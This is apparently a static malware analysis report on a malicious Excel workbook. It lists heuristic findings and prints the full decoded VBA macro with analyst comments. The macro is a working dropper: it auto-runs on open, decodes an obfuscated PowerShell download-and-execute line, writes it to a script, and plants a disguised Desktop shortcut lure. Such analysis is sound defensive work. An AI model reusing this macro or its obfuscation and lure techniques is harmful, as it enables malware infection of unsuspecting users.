Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 af7f61de1689b06c…

MALICIOUS

Office (OOXML)

20.2 KB Created: 2015-06-05 18:19:34 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-03-31
MD5: 30d6cdb59876c5bd6667e2cd3c72e689 SHA-1: e66059cad1a8a919ebc555ade1f8c05b77fe531a SHA-256: af7f61de1689b06c08358cf803aef164209d2abaf7171a47227f34cf019cac50
260 Risk Score

Heuristics 10

  • VBA project inside OOXML medium 9 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage — in this sample the object is used only through CreateShortcut to write a .lnk file to the user's Desktop; the macro itself does not call Run/Exec, execution is deferred to the user clicking the shortcut
    Matched line in script
                With CreateObject("WScript.Shell").CreateShortcut(sShortcutLocation)
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. In this sample the CreateObject("WScript.Shell") call itself is in clear text; what the Replace-based junk-token decoder (keyed on the constant "ttpexereqershcom-outpss") hides is the payload: a PowerShell one-liner `Invoke-Webrequest https:///favicon.icon -outFile %LOCALAPPDATA%\Temp\diagnostics.exe; %LOCALAPPDATA%\Temp\diagnostics.exe` written to %LOCALAPPDATA%\Temp\malicious.ps1, plus a Desktop shortcut GA17asa.lnk whose target is `C:\Windows\System32\Windowspowershell\v1.0\powershell.exe -exec bypass -File <that script>`. Note that the download URL has no host component ("https:///"), so the second stage cannot be fetched as written; this may be a template, test build or redacted sample.
    Matched line in script
                With CreateObject("WScript.Shell").CreateShortcut(sShortcutLocation)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
                With CreateObject("WScript.Shell").CreateShortcut(sShortcutLocation)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. No token detail line is rendered for this sample; the decoded source (macros.bas below) shows the entry points Auto_Open / AutoOpen / Workbook_Open / Document_Open alongside a CreateObject call, which is consistent with this rule firing.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub Document_Open()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access) — reads LOCALAPPDATA (drop directory for the .ps1 and the downloaded .exe) and USERPROFILE (Desktop path for the .lnk lure)
    Matched line in script
            var = "Invoke-Webabcduest hefghs:///favicon.icon appleFile " & Environ$("LOCALAPPDATA") & "\Temp\diagnostics.xlsx; " & Environ$("LOCALAPPDATA") & "\Temp\diagnostics.xlsx"

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 5291 bytes
SHA-256: 0c44e0f8d3a3e2a03ada257d84a1edf39d0869081f52ff45304efdd5cf17e113
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
'Attribute VB_Name = "Module1"
Option Explicit

' [analyst] Win32 CreateFile/WriteFile constants for WriteStringToFile below.
' Only OPEN_ALWAYS is actually passed (see WriteStringToFile), so an existing
' target file is reopened without truncation; CREATE_ALWAYS is declared but unused.
Private Const GENERIC_WRITE = &H40000000
Private Const GENERIC_READ = &H80000000
Private Const FILE_ATTRIBUTE_NORMAL = &H80
Private Const CREATE_ALWAYS = 2
Private Const OPEN_ALWAYS = 4
Private Const INVALID_HANDLE_VALUE = -1


' [analyst] Raw kernel32 file I/O is declared instead of using VBA's Open/Print;
' presumably to keep the dropped-file write away from VBA-level file-write
' hooks and signatures (inference). ReadFile is declared but never called in
' this module.
' NOTE(review): the declarations carry PtrSafe but pass handles and pointers
' (hFile, hObject, lpOverlapped, lpSecurityAttributes, hTemplateFile) as Long
' rather than LongPtr. On 64-bit Office the marshalling is therefore not
' type-correct and the drop may fail there — confirm in a 64-bit sandbox.
Private Declare PtrSafe Function ReadFile Lib "kernel32" (ByVal hFile As Long, _
   lpBuffer As Any, ByVal nNumberOfBytesToRead As Long, _
   lpNumberOfBytesRead As Long, ByVal lpOverlapped As Long) As Long

Private Declare PtrSafe Function CloseHandle Lib "kernel32" ( _
  ByVal hObject As Long) As Long

Private Declare PtrSafe Function WriteFile Lib "kernel32" ( _
  ByVal hFile As Long, lpBuffer As Any, _
  ByVal nNumberOfBytesToWrite As Long, _
  lpNumberOfBytesWritten As Long, ByVal lpOverlapped As Long) As Long

Private Declare PtrSafe Function CreateFile Lib "kernel32" _
  Alias "CreateFileA" (ByVal lpFileName As String, _
  ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, _
  ByVal lpSecurityAttributes As Long, _
  ByVal dwCreationDisposition As Long, _
  ByVal dwFlagsAndAttributes As Long, ByVal hTemplateFile As Long) _
  As Long

Private Declare PtrSafe Function FlushFileBuffers Lib "kernel32" ( _
  ByVal hFile As Long) As Long
' [analyst] Dropper helper: writes TheData to FileName via kernel32
' CreateFile/WriteFile instead of VBA Open/Print. Returns True only when
' WriteFile reported success.
'   FileName    - full path of the file to write (Jeez passes %LOCALAPPDATA%\Temp\malicious.ps1)
'   TheData     - the bytes to write (Jeez passes the decoded PowerShell one-liner)
'   NoOverwrite - if True and the file already exists, returns False without writing;
'                 Jeez uses the default False, so an existing file is overwritten.
' Observations:
'   * OPEN_ALWAYS does not truncate: if the target exists and is longer than
'     TheData, the old tail survives after the new content.
'   * On WriteFile failure the handle is never closed (CloseHandle runs only on success).
'   * lSuccess receives a Boolean (-1/0) from the "<> 0" comparison, not WriteFile's Long.
'   * The ErrorHandler label is not targeted by any On Error statement; it is dead.
Public Function WriteStringToFile(FileName As String, ByVal TheData As String, _
    Optional NoOverwrite As Boolean = False) As Boolean

Dim lHandle As Long
Dim lSuccess As Long
Dim lBytesWritten As Long, lBytesToWrite As Long
If NoOverwrite = True And Dir(FileName) <> "" Then Exit Function
lBytesToWrite = Len(TheData)
lHandle = CreateFile(FileName, GENERIC_WRITE Or GENERIC_READ, _
                     0, 0, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0)

If lHandle <> INVALID_HANDLE_VALUE Then
   lSuccess = WriteFile(lHandle, ByVal TheData, _
                        lBytesToWrite, lBytesWritten, 0) <> 0
   If lSuccess <> 0 Then
      lSuccess = FlushFileBuffers(lHandle)
      lSuccess = CloseHandle(lHandle)
   End If
End If
ErrorHandler:
WriteStringToFile = lSuccess <> 0
End Function

' [analyst] Main payload. Rebuilds its strings by Replace()-ing junk tokens
' with slices of decryptValue, then (1) drops a Desktop shortcut that launches
' powershell.exe on a script path and (2) writes that script. The macro never
' executes anything itself: execution waits for the user to double-click the
' folder-looking .lnk, which the Latvian MsgBox at the end asks them to do.
' The always-true string comparisons ("catsanddogs" = "catsanddogs", ...) are
' junk control flow; every Else branch is dead code. data() and sAns are unused.
Public Function Jeez()

    Dim decryptValue As String
    Dim data() As String
    Dim sAns As String
    Dim tempPath As String
    Dim sShortcutLocation As String
    Dim targetPath As String
    Dim arguments As String
    Dim var As String
    ' [analyst] Key slices (1-based Mid): Left(,3)="ttp"  Mid(4,3)="exe"  Mid(7,3)="req"
    '   Mid(10,4)="ersh"  Mid(14,3)="com"  Mid(17,4)="-out"  Mid(21,3)="pss"
    decryptValue = "ttpexereqershcom-outpss"
    If "catsanddogs" = "catsanddogs" Then
        ' [analyst] After the five Replace() calls, var decodes to:
        '   Invoke-Webrequest https:///favicon.icon -outFile %LOCALAPPDATA%\Temp\diagnostics.exe; %LOCALAPPDATA%\Temp\diagnostics.exe
        ' The URL has no host ("https:///"), so as written the download cannot
        ' succeed — template, test build or redacted sample (cannot tell from here).
        ' The "microsoft" Replace matches nothing and is a no-op.
        var = "Invoke-Webabcduest hefghs:///favicon.icon appleFile " & Environ$("LOCALAPPDATA") & "\Temp\diagnostics.xlsx; " & Environ$("LOCALAPPDATA") & "\Temp\diagnostics.xlsx"
        var = Replace(var, "efgh", Left(LCase(decryptValue), 3))       ' hefghs -> https
        var = Replace(var, "abcd", Mid(LCase(decryptValue), 7, 3))     ' Webabcduest -> Webrequest
        var = Replace(var, "xlsx", Mid(LCase(decryptValue), 4, 3))     ' diagnostics.xlsx -> diagnostics.exe (both)
        var = Replace(var, "microsoft", Mid(LCase(decryptValue), 14, 3)) ' no match
        var = Replace(var, "apple", Mid(LCase(decryptValue), 17, 4))   ' appleFile -> -outFile
        ' [analyst] Lure shortcut dropped on the user's Desktop.
        sShortcutLocation = Environ$("USERPROFILE") & "\Desktop\GA17asa.lnk"
        If "doglovescat" = "doglovescat" Then
            ' [analyst] Dropped script: %LOCALAPPDATA%\Temp\malicious.ps1
            ' (the "netflix" Replace matches nothing).
            tempPath = Environ$("LOCALAPPDATA") & "\Temp\malicious.ps1"
            tempPath = Replace(tempPath, "netflix", Mid(LCase(decryptValue), 21, 3))
            ' [analyst] -> "-exec bypass -File %LOCALAPPDATA%\Temp\malicious.ps1"
            arguments = "-xlsxc bypass -File " & tempPath
            arguments = Replace(arguments, "xlsx", Mid(LCase(decryptValue), 4, 3))
            If "notfair" = "notfair" Then
                ' [analyst] -> C:\Windows\System32\Windowspowershell\v1.0\powershell.exe
                targetPath = "C:\Windows\System32\Windowspowqwerell\v1.0\powqwerell.xlsx"
                targetPath = Replace(targetPath, "xlsx", Mid(LCase(decryptValue), 4, 3))
                targetPath = Replace(targetPath, "qwer", Mid(LCase(decryptValue), 10, 4))
            Else
                MsgBox "Dogsarecoolzzz!"
            End If
        End If
        If "dogsandcats" = "dogsandcats" Then
            ' [analyst] WScript.Shell is used only for CreateShortcut here, not Run/Exec.
            ' shell32.dll icon index 3 is commonly the closed-folder icon, so the .lnk
            ' masquerades as a folder; the lure text below names a folder "GA17332332".
            ' "rekins" is likely Latvian rēķins, "invoice".
            With CreateObject("WScript.Shell").CreateShortcut(sShortcutLocation)
                .targetPath = targetPath
                .Description = "rekins"
                .arguments = arguments
                .IconLocation = "%SystemRoot%\system32\shell32.dll, 3"
                 .Save
            End With
            ' [analyst] Writes the decoded PowerShell one-liner with raw WriteFile; return value ignored.
            WriteStringToFile tempPath, var
            ' [analyst] Latvian: "Go to the desktop to view the files in folder GA17332332".
            MsgBox "Dodieties uz darbavirsmu, lai apskatitu failus mape GA17332332"
        Else
            MsgBox "Dogsarecool!"
        End If
    Else
        MsgBox "Dogsarecoolx!"
    End If
End Function

' [analyst] The effective Excel trigger: Auto_Open in a standard module runs
' when the workbook is opened with macros enabled.
Sub Auto_Open()
Jeez
End Sub

' [analyst] Word auto-exec name; inert in an Excel workbook, included shotgun-style.
Sub AutoOpen()
Jeez
End Sub

' [analyst] Workbook_Open is only an event handler when it lives in the
' ThisWorkbook document module. Here it sits in Module1 and the ThisWorkbook
' module (Ši_darbgramata, below) holds no code, so this is a plain Sub that
' never fires on open.
Sub Workbook_Open()
Jeez
End Sub

' [analyst] Not an auto-exec name in any Office host; dead entry point.
Sub WorkbookOpen()
Jeez
End Sub

' [analyst] Word document-class event name; inert in Excel, and in a standard
' module it is not an event handler anyway.
Sub Document_Open()
Jeez
End Sub

' [analyst] Not an auto-exec name in any Office host; dead entry point.
Sub DocumentOpen()
Jeez
End Sub







' [analyst] ThisWorkbook document module (Latvian UI name "Ši darbgrāmata").
' The VB_Base GUID is the standard Excel Workbook class. It contains attributes
' only — no Workbook_Open handler — so the Workbook_Open Sub in Module1 is not
' wired to the event.
Attribute VB_Name = "Ši_darbgramata"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' [analyst] Sheet1 document module (Latvian "Lapa1"); VB_Base GUID is the
' standard Excel Worksheet class. Attributes only, no code.
Attribute VB_Name = "Lapa1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 34816 bytes
SHA-256: 1175dcba774d86bcc4437ca26cee36cb8c4d17f56af23e2b97d5c4b6e79255cb